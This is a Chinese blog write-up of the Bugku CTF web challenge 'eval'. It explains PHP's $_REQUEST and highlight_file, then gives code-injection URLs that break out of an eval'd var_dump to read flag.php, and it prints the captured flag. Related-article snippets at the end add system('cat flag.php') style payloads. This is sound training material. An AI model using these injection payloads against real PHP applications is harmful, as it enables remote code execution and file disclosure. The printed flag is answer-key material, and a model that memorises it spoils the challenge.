【愚公系列】2023年06月 Bugku-Web(eval)

最新推荐文章于 2024-08-04 21:17:36 发布
最新推荐文章于 2024-08-04 21:17:36 发布
阅读量2.5k 收藏 3
点赞数 2
分类专栏: # CTF-Bugku-WEB 文章标签: 前端 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aa2528877987/article/details/131426831
版权
文章讨论了PHP中的$_REQUEST变量带来的安全风险,如参数污染、XSS和SQL注入,并举例说明了eval函数的滥用可能导致的代码执行漏洞。同时,提到了文件包含攻击和如何通过构造特定请求获取被注释的flag,强调了安全编码的重要性。
摘要由CSDN通过智能技术生成

文章目录

前言

1.$_REQUEST

在PHP中,$_REQUEST是一个关联数组,包含了HTTP请求参数(GET、POST和COOKIE)中的所有变量。虽然它为开发人员提供了方便,但如果不正确使用,也会引起安全问题,例如以下一些漏洞:

  1. 参数污染:攻击者可以通过提交带有相同名称但不同值的GET和POST请求,来覆盖$_REQUEST数组中的某些变量。这个漏洞称为参数污染,可以导致应用程序出现意外行为或安全性问题。

  2. 跨站脚本攻击:如果应用程序没有正确过滤用户提交的数据,那么攻击者可以提交恶意脚本,以窃取用户的数据或伪造用户的行为。攻击者可以使用$_REQUEST来传递恶意数据。

  3. SQL注入:如果应用程序没有对用户输入进行充分的验证和过滤,攻击者可能会提交恶意SQL代码,并通过$_REQUEST将其传递给数据查询语句。这可能会导致数据库中的数据泄露、数据损坏或应用程序崩溃。

  4. 文件包含攻击:攻击者可以通过提交恶意文件名和路径来利用应用程序中的文件包含漏洞。这种攻击可能会导致服务器文件泄露、敏感信息泄露或服务器被入侵。

$_REQUEST 函数是一个用于访问 GETPOSTCOOKIE 三个数组的超全局变量。它可以用于从客户端收集用户提交的数据。

,$_REQUEST 函数的使用与 $_GET$_POST$_COOKIE 相似。它接收一个字符串参数,指定所需的变量,然后返回该变量的值。与 $_GET$_POST 不同的是,$_REQUEST 可以访问 GETPOSTCOOKIE 三个数组中的数据。

以下是一个使用 $_REQUEST 函数的示例:

<html>
<body>

<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
  Name: <input type="text" name="name">
  <br><br>
  <input type="submit" value="Submit">
</form>

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // collect value of input field
    $name = $_REQUEST['name'];
    if (empty($name)) {
        echo "Name is empty";
    } else {
        echo $name;
    }
}
?>

</body>
</html>

上面的代码中,当用户提交表单时,会使用 $_REQUEST 函数获取输入字段的值。如果输入字段为空,则输出 “Name is empty”,否则输出输入字段的值。

需要注意的是,$_REQUEST 函数是不安全的,因为它无法确定用户的输入值是来自于哪个数组。因此,为了确保安全性,建议仅使用 $_GET$_POST$_COOKIE 函数。

2.highlight_file

highlight_file函数用于将PHP文件的语法高亮显示输出。它将使用不同颜色和字体样式来显示PHP代码的各个部分,使其更易于阅读和理解。

函数语法:highlight_file($filename, $return = false);

其中,参数$filename是要高亮显示的PHP文件的路径,参数$return用于控制函数的输出方式,默认值为false

如果$return参数设置为false,则highlight_file函数将直接输出高亮显示后的PHP代码到浏览器,并返回true;如果$return参数设置为true,则highlight_file函数将返回高亮显示后的PHP代码字符串,而不会直接输出到浏览器。

示例代码:

<?php
// 将 PHP 文件高亮显示
highlight_file('test.php');
?>

此代码将读取名为test.php的文件,将其语法高亮显示并输出到浏览器。

一、eval

1.题目

在这里插入图片描述

2.答题

打开题目审计源码

在这里插入图片描述

<?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>

进行全局变量查看

http://114.67.175.224:11286/?hello=$GLOBALS

在这里插入图片描述
说明flag不是变量,应该就在flag.php里头被注释了

解法一:构造闭合

http://114.67.175.224:11286/?hello=);highlight_file('flag.php');var_dump(

在这里插入图片描述

解法二:使用文件读取函数

http://114.67.175.224:11286/?hello=file(%27flag.php%27)

在这里插入图片描述
得到flag:flag{34ad156d7d51f9372d7a08f120fad059}

愚公搬代码
关注
专栏目录
愚公系列202306 网络安全高级班 005.TCP-IP模型
时光隧道
05-06 8131
TCP/IP模型是一种基于分层的网络协议模型,它由四个层级构成:应用层、传输层、网络层和数据链路层。每一层都有自己的功能和任务,目的是实现在通信网络中数据的传递和处理。这个模型是互联网通信的基础。
愚公系列202306 网络安全(交通银行杯)-古典密码
时光隧道
04-13 8190
古典密码是指使用传统的替换或移位方式对明文进行加密,例如凯撒密码、栅栏密码等。在这种加密方式中,加密密钥通常是公开的,因此易被破解。现代密码学基本上已经放弃了古典密码的加密方式,而采用更加高级的数学算法来保证加密的安全性。ASCII是一种字符编码标准,它规定了128个字符的编码,包括26个大写字母、26个小写字母、10个数字、标点符号和控制字符等。栅栏密码是一种简单的加密方式,是将明文按照一定方式排列,然后按照规定的方式读取密文。
BugKu_eval
Kobalos的博客
08-03 1625
访问目标地址,发现一段php代码 首先做一个简单的分析 <?php include "flag.php"; ///include是将flag.php文件包含进页面代码,顺便提示了flag位置 $a = @$_REQUEST['hello']; ///$_REQUEST可以用于接受get和post传递的参数 eval( "var_dump($a);"); ///eval函数可以把字符串当作php命令执行 show_source(__FILE__); ?&g.
Bugkueval
金 帛的博客
02-13 1795
BugkuWP
[Bugku] web-CTF靶场系列系列详解④!!!
最新发布
muyuchen110的博客
08-04 510
平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。
Bugku题目eval
zlloveyouforever的博客
06-19 1415
b
bugku -- eval
qq_51802152的博客
12-13 703
bugku -- eval
[Bugku web] eval
DdddddXxxxx的博客
07-19 286
打开网页是相关代码 能看出flag就在 flag.php这个文件中 include 打开包含 flag.php这个文件 定义a= 上传的hello的值 eval 字符串转化为php代码 var_dump($a) 查看a的字符类型并输出a 1.?hello=system(cat 'flag.php') 后查看网页源码 2.?hello=1,$b=flie('./flag.php'),print_r($b) 源代码要求提交一个hello 这边hello定义为1 定义b为flag.php这个...
愚公系列202306 网络安全(交通银行杯)-银河信号
时光隧道
04-14 8271
这是一个简单的替代暗号,用不同的符号取代拉丁字母。SGA可以在不同的语言中使用,比如在游戏《Minecraft》,《指挥官基恩》中。
愚公系列202306 网络安全(交通银行杯)-帮帮我吧
时光隧道
04-13 8303
手机输入法的历史可以追溯到20世纪80代。最早的手机输入法是T9输入法,它使用数字按键输入字母,例如按下数字2可以输入字母A、B、C。随着智能手机的出现,全键盘输入法和手写输入法也开始流行。现在,许多手机都配备了多种输入方式,以适应不同用户的需求。手机键盘加密的作用是为了保护用户的敏感信息不被恶意访问或窃取。
愚公系列202306 网络安全(交通银行杯)-zip伪加密
时光隧道
04-14 9073
zip伪加密就是通过修改zip压缩包特定的字节,进而在打开文件时压缩包被识别为使用了密码加密,从而达到伪装加密效果。我们已经知道ZIP文件格式中存在两个加密标志位,前面的加密标志位为数据区的加密标志位,后面的加密标志位为目录区的加密标志位。所谓伪加密就是修改目录区的加密标志位,使本来没有加密的ZIP文件,在解压的时候,需要用户输入密码来进行解压,但是这个密码又是不存在的。
bugku-eval
m0_62094846的博客
10-24 4274
这是一道php题,标题是eval,先查一下eval的用法 Eval,var_dump,echo的区别 var_dump()会将传入的变量打印到页面(变量类型,变量长度和变量值) eval()会执行传入到其中的php代码 echo输出的是最终的结果(变量类型和字符串) eval("var_dump($a);")就是把$a的内容打印出来 $a= @$_REQUEST['hello'] Request:使用 Request 对象访问任何基于 HTTP 请求传递的所有信息 可以看...
bugku-eval题解
qq_51775369的博客
10-11 574
eval 访问目标地址,发现一段php代码,简单分析 主要考察php 在url后加?hello=file('flag.php')即可 知识点: 此题考察php相关 include是将flag.php文件包含进页面代码 $request可用于接受get和post的传递的参数 eval函数可以把字符串作为php命令执行 知道这些你就可以用get方法传递hello变量,并在hello其内写入查看flag.php的命令了 ?hello=file(‘flag.p...
Bugku---web---eval
weixin_47450099的博客
04-29 587
Bugku---web---eval 网络安全
bugku eval
CTF
02-02 380
打开容器后发现就是一段php代码文件,@$_REQUEST定义全局变量,eval用于执行表达式并返回结果值。先查看目录下的所有文件。 接着读取flag.php的文件内容。但是发现不行换一种方式读取。file()函数将整个文件读取到一个数组中,与file_get_contents()类似。 拿到flag。 flag{fca14a2e7f209a89b2fc1c9bcbec9c26}
BugKu eval
qq_71910178的博客
09-26 113
hello=file("flag.php")(有没有大佬可以讲解一下为什么用文件读取函数不用闭合avr_dump()可以直接执行)发现flag.php就在当前目录下 ,可尝试show_source("flag.php") 拿到flag。构造 123) system("ls" 查看该目录下的文件。想要执行系统命令需要先闭合var_dump里面的()或者继续构造用Linux命令去查看flag.php。既然执行命令不行,就直接打印出flag,不能用两个单词的命令查看,替换空格也不行。
十六、bugku eval
山兔的博客
09-06 286
?hello=system("cat flag.php") 查看源码 ?hello=`vi flag.php` 编辑源码 用cat也可以,cat只不过必须在源码里面看,而tac显示在前端。 单引号也可以,用system()绕过。 require 一般放在 PHP 文件的最前面,程序在执行前就会先导入要引用的文件。 include 一般放在程序的流程控制中,当程序执行时碰到才会引用,简化程序的执行流程。 require 引入的文件有错误时,执行会中断,并返回一个致命错误。include 引入的文
Bugku Web eval
网安小趴菜
10-28 707
Bugku CTF Web eval 个人解题思路
Bugku——Web——eval
慎铭的博客
02-02 1153
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 给出了如上代码,很明显,flag在flag.php文件内。 REQUEST方法既可以接受GET方法,也可以接受POST方法,方便起见,我们选择GET方法。 eval函数 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且
程序员对自己2023的计划范文
09-21
### 回答1: 作为一名程序员,我在2023对自己的计划包括: 1. 不断学习和提升技能:我会继续学习新的编程语言和框架,以及不断提高编码能力。 2. 参加行业相关的培训和会议:我会参加各种行业相关的培训课程和会议,以便获得最新的行业知识和技能。 3. 参加项目并积累经验:我会参加各种项目,以便积累丰富的经验,并提升个人能力。 4. 在业内建立良好的人脉关系:我会努力与业内的同行建立良好的人脉关系,并与他们保持联系。 5. 寻找更好的发展机会:我会不断寻找更好的发展机会,以便在职业生涯中取得更大的成功。 总之,我在2023会努力工作,不断学习和提升,并寻找更好的发展机会,以在职业生涯中取得更大的成功。 ### 回答2: 2023的计划对于我作为一名程序员来说十分重要,我希望能够提升自己的技能水平并取得更好的职业发展。以下是我的计划: 首先,我计划继续学习并掌握新的编程语言和技术。随着科技的不断发展,编程语言和技术也在不断更新换代,作为一名程序员,保持学习的状态是必不可少的。我将花费更多的时间学习目前主流的编程语言,如Python、Java等,并尝试掌握最新的前端和后端技术。通过不断学习,我希望能够拥有更广泛的技术视野和更强大的技术能力。 其次,我计划参与更多的项目和实践。在理论学习之外,实践是提升技能的关键。我计划积极寻找项目机会,无论是个人项目还是团队项目,都可以提供宝贵的实践机会。通过参与各种项目,我可以锻炼解决问题的能力,提高编码和协作能力。同时,我也希望通过实践中的挑战和失败,不断完善自己,进一步提高自己的技术水平和经验。 第三,我计划参加相关的培训和技术交流活动。参加培训和技术交流活动可以与其他程序员交流和学习,了解行业最新动态和趋势。我计划参加各种技术研讨会、讲座和培训班,通过与行业专家和其他程序员的交流,深入了解各种编程技术和最佳实践。同时,我也希望能够积极参与技术社区,与其他程序员分享自己的经验和见解,不断提高自己的影响力和口碑。 最后,我计划在个人项目和开源社区上做出更多的贡献。通过自己的努力,我希望能够在个人项目中实现一些有意义的功能或解决一些实际问题,并将其开源。通过开源社区的贡献,我可以帮助他人解决问题,同时也能够借助其他人的反馈和指导,不断改进自己的代码和设计能力。 总之,2023对于我作为一名程序员来说是充满挑战和机遇的一。我将不懈努力,持续学习和实践,不断提升自己的技能水平和职业发展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愚公搬代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值